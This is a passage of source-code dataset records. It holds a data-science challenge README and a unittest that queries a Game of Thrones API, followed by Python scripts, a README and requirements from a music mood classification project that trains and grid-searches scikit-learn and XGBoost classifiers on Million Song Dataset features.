0.7747151851654053, "avg_line_length": 56.284210205078125, "blob_id": "92afc1f30fd24d73476ec7c3be5c08a3a8186412", "content_id": "b16fcec1ffb3af8a2b07a4515184398bee1251b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5474, "license_type": "no_license", "max_line_length": 426, "num_lines": 95, "path": "/README.md", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "# walter eaves\n\nThis is my answer for the first part bundled into a setup.py package.\n\nThe results are given as a log file of a run test_Test4 see contrib/test.log\n\nThe test_Test4.py file is in tests/ and contrib/\n\nThe source code is in blkswn/ there is another design README.md in there.\n\nHere are the results.\n\n INFO:Test:setup\n INFO:Test:c). books from API: 12\n INFO:Test:tearDown\n INFO:Test:setup\n INFO:Test:a). House Breakstone is at https://www.anapioficeandfire.com/api/houses/41\n INFO:Test:b). first 40 gender distribution [('Male', 26), ('Female', 14)] \n INFO:Test:d). 2 books have character High Septon https://www.anapioficeandfire.com/api/characters/15\n INFO:Test:tearDown\n\nThere is a huge amount of testing done in the test scripts.\n\nJust to summarize, for testing, this is simple implementation that interrogates the website a\npage at a time, for each books, houses and characters. That is re-buffered to give an iterator on\nthe underlying records. That is then written to a text file.\n\nThe text files are re-loaded - in another test script - and processed as\niterators. This means that lazy evaluation should be used for all the web-site\naccess, so it should be possible to run the methods in test_Test4 directly on an\niterator that uses the web-site. I didn't attempt this, but in principle, it\nshould work.\n\nThe code is in the setup.py source distribution. I've also provided my collected\ndata as IceFireR.zip\n\n#If you like this challenge, you will like working with Black Swan's Data Science team!\n\nFirst, before delving into the challenges, we would like to explain that we use version control and virtual environments in our work. We think they are essential to produce good quality stuff and it helps us a lot! So we expect you do the same whlist working on these challenges. Please commit several times as your work progress with meaningful comments and create a requirements file so we can see what you are working with.\n\nYour end result should be scripts (suitably commented) written in Python (2 or 3) that anyone can easily run, i.e., they need to be a **working solution**. The way you organise them it's up to you.\n \nNow, as for the challenges, you find the data you need in the \"data\" folder and should be comprised of 3 files: csv_file.csv, json_file.json, txt_file.txt\n\nThe challenges are divided into 4 parts:\n\n__API Access__\n\nThis challenge will involve querying an API and extracting information from it. The API in question provides information on Game of Thrones, allowing one to access information on the houses, characters and books.\n\n* API URL: http://anapioficeandfire.com/api/{SECTION}/{INDEX}\n\nWhere SECTION can be either ‘books’, ‘characters’, or ‘houses’ and INDEX is an integer to a certain entry in a section.\n\nFor example, to access the character Peter Baelish, the full request would be http://anapioficeandfire.com/api/characters/823, where 823 is the index corresponding to that character. \n\nIt's recommended to read the full documentation, which can be found here: https://anapioficeandfire.com/Documentation\n\nWe would like you to answer the following:\n\na) What index corresponds to the house “House Breakstone”?\n \nb) How many males, females and unknown genders are there in the first 40 characters? Note, index 0 does not correspond to a character, so full range is 1 - 40 both ends inclusive. \n\nc) How many books can be accessed from this API?\n\nd) How many books does the character ‘High Septon’ appear in? (ignoring ‘povcharacters’) \n\nHint: index value of Septon needs to be found first; it is smaller than 20.\n\n__File type manipulation and formatting__\n\nThree files are presented, one CSV, one TXT and one JSON file. Each contain 1000 rows of data. There are two challenges, both involving collating these files into one data frame. The fields in all files are:\n\n'author.properties.friends', 'author.properties.status_count', 'author.properties.verified', 'content.body', 'location.country', 'properties.platform', 'properties.sentiment', 'location.latitude', 'location.longitude'\n\nwhere the ‘.’ Indicates a nested field.\n \na) Begin by collating the CSV and TXT files together into one pandas dataframe. The resulting dataframe should be 2000 rows and have all of the columns present in both files.\n\nb) Next, using the created dataframe, integrate the data from the JSON file into the existing columns. The resulting dataframe should now be 3000 rows long.\n\n__Data exploration__\n\nIn this challenge we would like to know something interesting about the data. You are free to explore as you wish, producing plots, tables, statistics, etc. Feel free to use any variables in the dataset or include external data you may consider relevant to complement your analysis. \n\n__Model creation__\n\nThis final task involves creating a predictive model for a response variable, given a set of features. The task is to create a predictive model for the variable ‘properties.sentiment’ using the remaining features in the data set. \n\nThe data files attached should be used to create the model. \n\nWhat we would like to see from this task is your thoughts and decisions on training and testing a model. This will include, but not limited to, considering aspects such as feature selection & creation, parameter tuning of the model and train / validation / test split. \n\nThis task is a blank canvas to work with. The only caveat is that you must be able to explain the methods and models you are using.\n" }, { "alpha_fraction": 0.5806384086608887, "alphanum_fraction": 0.6028979420661926, "avg_line_length": 26.674419403076172, "blob_id": "8a5cb231936e95b9fc59cbe280c6b9ec9acfd287", "content_id": "dbd0a8dd970099b21c1138c2e7dd23f1975e7c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4770, "license_type": "no_license", "max_line_length": 96, "num_lines": 172, "path": "/tests/test_Test4.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test4.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test of IceFireA\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nimport itertools\nfrom functools import partial\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\nfrom blkswn import IceFireR\nfrom blkswn import IceFireA\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test4(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n def test_008(self):\n d0 = IceFireA.make0()\n\n ## Books from API\n b0 = list(d0['books']._src)\n self.logger.info(\"c). books from API: {0}\".format(len(b0)))\n\n def test_010(self):\n d0 = IceFireA.make0()\n\n h0 = d0['houses']._src # as an iterable\n walk, walk2 = itertools.tee(h0)\n\n # check it can work\n v0 = IceFireA.first_true(walk, default='null')\n\n fpred = lambda x: x['name'].find(\"Breakstone\") > -1\n v0 = IceFireA.first_true(walk2, default='null', pred=fpred)\n\n self.logger.info(\"a). House Breakstone is at {0}\".format(v0['url']))\n\n ## b). How many males, females and unknown genders are there in the first\n ## 40 characters? Note, index 0 does not correspond to a character, so\n ## full range is 1 - 40 both ends inclusive.\n\n c0 = d0['characters']._src # as an iterable\n\n c1 = itertools.islice(c0, 40)\n walk, walk2 = itertools.tee(c1)\n\n gndrs = list((x['gender'] for x in walk2))\n gtypes = set(gndrs)\n\n ## lambda functions don't work, try partials\n def snap0(x, tag=\"\"):\n return x == tag\n\n tag0 = list(gtypes)[0]\n snap1 = partial(snap0, tag=tag0)\n v0 = snap1(gndrs[0])\n\n ## List of partials\n\n fpreds = ( partial(snap0, tag=x) for x in gtypes )\n fpreds = list(fpreds)\n\n cnts = list( ( sum(map(fx, gndrs)) for fx in fpreds ))\n self.logger.info(\"b). first 40 gender distribution {} \".format(list(zip(gtypes, cnts))))\n\n ## d) How many books does the character ‘High Septon’ appear in?\n ## (ignoring ‘povcharacters’)\n\n d0 = IceFireA.make0()\n c0 = d0['characters']._src # as an iterable\n\n walk, walk2 = itertools.tee(c0)\n\n fpred = lambda x: x['name'].find(\"High Septon\") > -1\n ckey0 = IceFireA.first_true(walk, default={ 'url': 'null' }, pred=fpred)\n\n ## to match the url of a character in books.characters\n tag0 = ckey0['url']\n snap1 = partial(snap0, tag=tag0)\n\n b0 = d0['books']._src # as an iterable\n walk, walk2 = itertools.tee(b0)\n\n bc = dict(((x['name'], x['characters']) for x in walk2))\n\n x00 = list(bc.values())\n x1 = x00[0]\n \n v0 = ( IceFireA.first_true(x, default='', pred=snap1) for x in x00 )\n v0 = list(v0)\n\n ## if length is greater than 0 is the URL of ckey0\n def snap2(x):\n return int(len(x) > 0)\n\n # finally, apply snap2 and sum \n nckey0 = sum(map(snap2, v0))\n\n self.logger.info(\"d). {0} books have character High Septon {1}\"\n .format(nckey0, ckey0['url']))\n\n pass\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" } ]
20
ashish3805/JoyDivision
https://github.com/ashish3805/JoyDivision
58330ec2152f2edd05e27dd8eb5de1f0d0d7659f
6745a5ad79423ec70b76012699f91400d0d3e79b
ee2860d32fc8e280ecc0af160c51c08c7f5c6126
refs/heads/master
2021-05-08T18:36:36.582932
2018-01-08T08:55:57
2018-01-08T08:55:57
119,525,199
1
0
null
2018-01-30T11:14:11
2018-01-08T08:56:16
2018-01-08T08:56:15
null
[ { "alpha_fraction": 0.6897172331809998, "alphanum_fraction": 0.7015424370765686, "avg_line_length": 38.693878173828125, "blob_id": "7778d1d29618fb71455a65297d2225495b25f580", "content_id": "88bcfa1a6d7251e61ea102f30d3380bc52ba3a07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7780, "license_type": "no_license", "max_line_length": 122, "num_lines": 196, "path": "/src/evaluation.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from sklearn.metrics import accuracy_score, v_measure_score\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier, ExtraTreesClassifier\nfrom get_train_test import train, test\nfrom sklearn.ensemble import VotingClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.cluster import KMeans\nfrom sklearn.naive_bayes import GaussianNB\nimport xgboost as xgb\nimport subprocess\nfrom sklearn.neighbors import KNeighborsClassifier\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\nprint features\n\nprint \"Evaluating on all features \"\nprint \"---------------------------------------------------------------------------------------------------\"\n\nrfc = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=15, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=300, n_jobs=1, oob_score=False, random_state=None,\n verbose=0, warm_start=False)\n\nrfc.fit(train[features], train['Mood'])\nprint \"Random Forest Classifier\"\nprint accuracy_score(test['Mood'], rfc.predict(test[features]))\n\n#update XGB params\nxgboost = xgb.XGBClassifier(base_score=0.5, colsample_bylevel=1, colsample_bytree=1,\n gamma=0.01, learning_rate=0.1, max_delta_step=0.1, max_depth=5,\n min_child_weight=1, missing=None, n_estimators=500, nthread=-1,\n objective='binary:logistic', reg_alpha=0, reg_lambda=1,\n scale_pos_weight=1, seed=0, silent=True, subsample=1)\nxgboost.fit(train[features], train['Mood'])\nprint \"XGBoost Classifier\"\nprint accuracy_score(test['Mood'], xgboost.predict(test[features]))\n\n\ngb = GradientBoostingClassifier(criterion='mse', init=None, learning_rate=0.1,\n loss='exponential', max_depth=6, max_features=None,\n max_leaf_nodes=None, min_impurity_split=1e-07,\n min_samples_leaf=1, min_samples_split=2,\n min_weight_fraction_leaf=0.0, n_estimators=200,\n presort='auto', random_state=None, subsample=1.0, verbose=0,\n warm_start=False)\ngb.fit(train[features], train['Mood'])\nprint \"Gradient Boosting Classifier\"\nprint accuracy_score(test['Mood'], gb.predict(test[features]))\n\n\nxtra = ExtraTreesClassifier(bootstrap=False, class_weight=None, criterion='gini',\n max_depth=15, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=100, n_jobs=1, oob_score=False, random_state=None,\n verbose=0, warm_start=False)\nxtra.fit(train[features], train['Mood'])\nprint \"Extra Trees Classifier\"\nprint accuracy_score(test['Mood'], xtra.predict(test[features]))\n\n\nada = AdaBoostClassifier(algorithm='SAMME.R', base_estimator=None, learning_rate=0.1, n_estimators=300, random_state=None)\nada.fit(train[features], train['Mood'])\nprint \"Ada Boost Classifier\"\nprint accuracy_score(test['Mood'], ada.predict(test[features]))\n\n\nknn = KNeighborsClassifier(algorithm='auto', leaf_size=30, metric='euclidean',\n metric_params=None, n_jobs=1, n_neighbors=29, p=2,\n weights='uniform')\nknn.fit(train[features], train['Mood'])\nprint \"KNeighbors Classifier\"\nprint accuracy_score(test['Mood'], knn.predict(test[features]))\n\n\nsvm = SVC(C=2, cache_size=200, class_weight=None, coef0=0.0,\n decision_function_shape=None, degree=3, gamma=0.1, kernel='linear',\n max_iter=-1, probability=False, random_state=None, shrinking=True,\n tol=0.001, verbose=False)\nsvm.fit(train[features], train['Mood'])\nprint \"Support Vector Machines\"\nprint accuracy_score(test['Mood'], svm.predict(test[features]))\n\nnb = GaussianNB()\nnb.fit(train[features], train['Mood'])\nprint \"Naive Bayes Classifier\"\nprint accuracy_score(test['Mood'], nb.predict(test[features]))\n\nestimators = []\nestimators.append(('RFC', rfc))\nestimators.append(('ExtraTreess', xtra))\nestimators.append(('AdaBoost', ada))\nestimators.append(('Gradient Boosting', gb))\nestimators.append(('KNeighbors', knn))\nestimators.append(('SVM', svm))\nestimators.append(('NB', nb))\nensemble = VotingClassifier(estimators)\nensemble.fit(train[features], train['Mood'])\nprint \"Voting Classifier\"\nprint accuracy_score(test['Mood'], ensemble.predict(test[features]))\n\n\nprint \"Evaluating on spectral features \"\nprint \"---------------------------------------------------------------------------------------------------\"\nrfc.fit(train[audio_features], train['Mood'])\nprint \"Random Forest Classifier\"\nprint accuracy_score(test['Mood'], rfc.predict(test[audio_features]))\n\nxgboost.fit(train[audio_features], train['Mood'])\nprint \"XGBoost Classifier\"\nprint accuracy_score(test['Mood'], xgboost.predict(test[audio_features]))\n\ngb.fit(train[audio_features], train['Mood'])\nprint \"Gradient Boosting Classifier\"\nprint accuracy_score(test['Mood'], gb.predict(test[audio_features]))\n\nxtra.fit(train[audio_features], train['Mood'])\nprint \"Extra Trees Classifier\"\nprint accuracy_score(test['Mood'], xtra.predict(test[audio_features]))\n\nada.fit(train[audio_features], train['Mood'])\nprint \"Ada Boost Classifier\"\nprint accuracy_score(test['Mood'], ada.predict(test[audio_features]))\n\n\nknn.fit(train[audio_features], train['Mood'])\nprint \"KNeighbors Classifier\"\nprint accuracy_score(test['Mood'], knn.predict(test[audio_features]))\n\nsvm.fit(train[audio_features], train['Mood'])\nprint \"Support Vector Machines\"\nprint accuracy_score(test['Mood'], svm.predict(test[audio_features]))\n\nnb.fit(train[audio_features], train['Mood'])\nprint \"Naive Bayes Classifier\"\nprint accuracy_score(test['Mood'], nb.predict(test[audio_features]))\n\nensemble.fit(train[audio_features], train['Mood'])\nprint \"Voting Classifier\"\nprint accuracy_score(test['Mood'], ensemble.predict(test[audio_features]))\n\n\nprint \"Evaluating on descriptive features \"\nprint \"---------------------------------------------------------------------------------------------------\"\nrfc.fit(train[qual_features], train['Mood'])\nprint \"Random Forest Classifier\"\nprint accuracy_score(test['Mood'], rfc.predict(test[qual_features]))\n\n\nxgboost.fit(train[qual_features], train['Mood'])\nprint \"XGBoost Classifier\"\nprint accuracy_score(test['Mood'], xgboost.predict(test[qual_features]))\n\n\ngb.fit(train[qual_features], train['Mood'])\nprint \"Gradient Boosting Classifier\"\nprint accuracy_score(test['Mood'], gb.predict(test[qual_features]))\n\nxtra.fit(train[qual_features], train['Mood'])\nprint \"Extra Trees Classifier\"\nprint accuracy_score(test['Mood'], xtra.predict(test[qual_features]))\n\nada.fit(train[qual_features], train['Mood'])\nprint \"Ada Boost Classifier\"\nprint accuracy_score(test['Mood'], ada.predict(test[qual_features]))\n\nknn.fit(train[qual_features], train['Mood'])\nprint \"KNeighbors Classifier\"\nprint accuracy_score(test['Mood'], knn.predict(test[qual_features]))\n\nsvm.fit(train[qual_features], train['Mood'])\nprint \"Support Vector Machines\"\nprint accuracy_score(test['Mood'], svm.predict(test[qual_features]))\n\nnb.fit(train[qual_features], train['Mood'])\nprint \"Naive Bayes Classifier\"\nprint accuracy_score(test['Mood'], nb.predict(test[qual_features]))\n\nensemble.fit(train[qual_features], train['Mood'])\nprint \"Voting Classifier\"\nprint accuracy_score(test['Mood'], ensemble.predict(test[qual_features]))\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7139860391616821, "avg_line_length": 35.66666793823242, "blob_id": "f8444784dc1455e16d11ecb51f6a0bf0d501f0a8", "content_id": "a5daa6c45bcea49e0fb138a630633965ad2d3b21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1430, "license_type": "no_license", "max_line_length": 133, "num_lines": 39, "path": "/src/gridsearch_gb.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\ngb_params = {\"loss\": ['deviance', 'exponential'], 'learning_rate': [0.1, 0.001, 0.001, 1], 'n_estimators': [100, 150, 200, 350, 500],\n 'max_depth': [3, 6, 10], 'criterion': ['mse']}\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\ngb_grid = GridSearchCV(estimator=GradientBoostingClassifier(), param_grid=gb_params, scoring=accuracy, cv=5)\ngb_grid.fit(train[features], train['Mood'])\n\nprint \"Gradient Boost grid search: \"\nprint \"CV results\", gb_grid.cv_results_\nprint \"Best GB\", gb_grid.best_estimator_\nprint \"Best CV score for GB\", gb_grid.best_score_\nprint \"Best GB params:\", gb_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.6652451753616333, "alphanum_fraction": 0.697938859462738, "avg_line_length": 33.26829147338867, "blob_id": "3ce4323e31b3d413462a827cb0015b0074e3876e", "content_id": "5ffddb57a3af053b03ae496ed80d74557ea3e50d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1407, "license_type": "no_license", "max_line_length": 123, "num_lines": 41, "path": "/src/gridsearch_xgb.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from xgboost import XGBClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\n\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\n\nparam_grid = {\"max_depth\": [3, 5, 10, 15, 17], \"learning_rate\": [0.1, 0.001, 1], \"n_estimators\": [100, 150, 200, 300, 500],\n \"gamma\": [0, 0.5, 0.1, 0.01], \"colsample_bytree\": [1], \"max_delta_step\": [0, 0.01, 0.1]}\n\n\nxgb_grid = GridSearchCV(estimator=XGBClassifier(), param_grid=param_grid, scoring=accuracy, cv=5)\nxgb_grid.fit(train[features], train['Mood'])\n\nprint \"SVM grid search: \"\nprint \"CV results\", xgb_grid.cv_results_\nprint \"Best SVM\", xgb_grid.best_estimator_\nprint \"Best CV score for SVM\", xgb_grid.best_score_\nprint \"Best SVM params:\", xgb_grid.best_params_\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n\n\n" }, { "alpha_fraction": 0.4955752193927765, "alphanum_fraction": 0.7079645991325378, "avg_line_length": 15.285714149475098, "blob_id": "27b8f122ba89bde19567c15225907b724da6565e", "content_id": "2ef44f58ebe7d4a93c41b7669194bc52fbb75c21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 113, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/requirements.txt", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "pandas==0.18.1\nscikit-learn==0.17.1\nnumpy==1.11.0\nvirtualenv==1.11.4\nmatplotlib=1.5.3\nseaborn==0.7.1\nxgboost==0.6" }, { "alpha_fraction": 0.7167019248008728, "alphanum_fraction": 0.7237491011619568, "avg_line_length": 32, "blob_id": "6429e215164a16246d00e969d43ab310af57d7e9", "content_id": "28b52f63b450f049797de73917c2579fb7c9a7ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1419, "license_type": "no_license", "max_line_length": 87, "num_lines": 43, "path": "/src/gridsearch_svm.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\nfrom get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\n# Scaling all numeric features for SVMs\nscaler = StandardScaler()\ntrain[features] = scaler.fit_transform(train[features])\n\n\nsvc_params = {\"C\": [1, 2, 3], \"gamma\": [0.1, 1, 2, 3, 4], \"kernel\": ['linear', 'rbf']}\n\nsvm_grid = GridSearchCV(estimator=SVC(), param_grid=svc_params, scoring=accuracy, cv=2)\nsvm_grid.fit(train[features], train['Mood'])\n\nprint \"SVM grid search: \"\nprint \"CV results\", svm_grid.cv_results_\nprint \"Best SVM\", svm_grid.best_estimator_\nprint \"Best CV score for SVM\", svm_grid.best_score_\nprint \"Best SVM params:\", svm_grid.best_params_\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7587209343910217, "alphanum_fraction": 0.7700581550598145, "avg_line_length": 57.28813552856445, "blob_id": "9bb643dc4901e59e363de5e3a9501ab68dccde5e", "content_id": "7f2747f9f422f3f3c7958d56625dd67b91090441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3440, "license_type": "no_license", "max_line_length": 172, "num_lines": 59, "path": "/README.md", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "## Music Mood Classification Using the Million Song Dataset\n\n\n### Technical Summary \n\nIf you want to see a quick summary of the methods & results, here are the [slides](http://bit.do/joydiv). \n\nA detailed technical report is available as a [PDF](https://github.com/bhavika/JoyDivision/blob/master/report/report.pdf)\n\n\n### Installation\n\n1. Clone/download ZIP from https://github.com/bhavika/JoyDivision.git\n2. cd JoyDivision\n3. If you want to create a virtual environment, run virtualenv <the name of the environment, say 'tekwani'>\n4. To begin using the virtual environment, you must activate it.\n $ source tekwani/bin/activate\n5. Now install the packages specified in requirements.txt. You can do this using\n pip freeze > requirements.txt (freeze the current state of the environment)\n pip install -r requirements.txt\n\n\n### Running the solution\n\n1. Download the data from the Google Drive link here: http://bit.do/datasets\n The total download size should be about 2.8 GB. \n2. Move the downloaded files to tekwani/data and check that it contains the following files:\n\n -fullset.pkl\n -train.pkl\n -test.pkl\n\nThe folder JoyDivision/explore contains plots, output for different estimators' grid search results, scripts to handle h5 files and a list of getter methods \nfor h5 files (hdf5_getters.txt)\n\nThe file `evaluation.py` is the final file that generates results as shown in the report. \nIt will run 6 models for 3 feature combinations - audio and descriptive, descriptive only, audio only.\n\n\n### Other files\n\n1. `create_dataset.py` builds the dataset and randomly splits it into a 60-40 distribution fof train and test sets.\n2. `models.py` evaluates feature importance for ensemble estimators and performs cross validation for all estimators.\n3. `read_h5.py` is used to pull data out of HDF5 files. To run this, you need to download the Million Song Subset and place it in `data`\n4. `spotify.py` searches for Track IDs for the songs we have labeled in Spotify's database.\n5. `spotify_audio_features.py` fetches Danceability, Energy, Speechiness, Acousticness, Valence and Instrumentalness for all the track IDs we were able to get from \n `spotify.py`. \n6. `rfe.py` gets the ranking of features. I use the number of optimal features (n) obtained here to select the top n features in `feature_importance.py` for the estimators.\n7. `feature_combinations.py` evaluates the importance of features when compared to the groups they're combined with. For e.g., Descriptive features paired with timbre, \n audio features paired with descriptive, etc\n8. `get_train_test.py` serves the train and test sets (*.pkl) to any file that imports it.\n7. `scratch\\labels.csv` contains the full list of songs and the labels I assigned to them. \n8. `scratch\\models.out` contains the output for `models.py`. These are only cross validation results. \n9. `learning_curve.py` plots the training score and cross validation score for an SVM with a linear kernel.\n10. `*.out` files - output files. \n11. `hdf5_getters.py` is an interface provided along with the Million Song Dataset by LabROSA (Columbia University). It is used to read HDF5 files which is the initial\n form of the Million Song Dataset.\n12. All files named `gridsearch_.py` are used to do a hyperparameter search for the models used. These models are ADABoostClassifier, ExtraTreesClassifier, \n GradientBoostingClassifier, SVM, KNearestNeighbour and RandomForestClassifier.\n\n" }, { "alpha_fraction": 0.6344314813613892, "alphanum_fraction": 0.6439957618713379, "avg_line_length": 29.852458953857422, "blob_id": "f88d83cf12f754470f2320b567d448f9df2bf5a9", "content_id": "1af7867b7de16ca3a87cd23b8ea40ff0e1777c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1882, "license_type": "no_license", "max_line_length": 177, "num_lines": 61, "path": "/src/read_h5.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport os\nimport hdf5_getters as getter\nimport glob\nimport csv\nfrom time import time\n\ntracks = []\n\nstart = time()\n\nread_file = pd.read_csv('../data/files.csv')\n\ntracks = read_file['Track'].tolist()\n\n\ndef recursive_glob(treeroot, pattern):\n results = []\n for base, dirs, files in os.walk(treeroot):\n for f in files:\n if os.path.basename(f) in tracks:\n results.append(base+'/'+f);\n return results\n\nresults = recursive_glob('../data/MillionSongSubset/data/', '*.h5')\n\n\ndef get_song_data(results):\n songs_data = []\n for f in results:\n h5 = getter.open_h5_file_read(f)\n songs_data.append(\n [os.path.basename(f), getter.get_artist_name(h5), getter.get_title(h5),\n getter.get_time_signature(h5), getter.get_key(h5),\n getter.get_segments_loudness_max(h5), getter.get_mode(h5),\n getter.get_beats_confidence(h5), getter.get_duration(h5),\n getter.get_tempo(h5), getter.get_loudness(h5),\n getter.get_segments_timbre(h5), getter.get_segments_pitches(h5),\n getter.get_key_confidence(h5)])\n h5.close()\n return songs_data\n\nfinal = get_song_data(results)\n\nheaders = ['File', 'Artist', 'Title', 'TimeSignature', 'Key', 'SegmentsLoudMax', 'Mode', 'BeatsConfidence', 'Length', 'Tempo', 'Loudness', 'Timbre', 'Pitches', 'KeyConfidence']\n\nprint (\"Elapsed time:\", time() - start)\n\nsongs_df = pd.DataFrame(final, columns=headers)\n\nsongs_df.to_pickle('../data/songs.pkl')\n\nsubset = songs_df[songs_df['File'].isin(tracks)]\nsubset_dedup = subset.drop_duplicates(subset=['File', 'Artist', 'Title'], keep='first')\nsubset_dedup.to_pickle('../data/subset.pkl')\n\n\n# import subprocess\n# subprocess.call(['speech-dispatcher']) #start speech dispatcher\n# subprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.6176065802574158, "alphanum_fraction": 0.6400733590126038, "avg_line_length": 37.28070068359375, "blob_id": "7530878f44637f95cd3bedbc8c9c38f77f16615d", "content_id": "380acbf5d1d38611e6c012641dcca4daa17f9cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2181, "license_type": "no_license", "max_line_length": 136, "num_lines": 57, "path": "/src/learning_curve.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.model_selection import ShuffleSplit\nfrom get_train_test import train\n\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Mode', 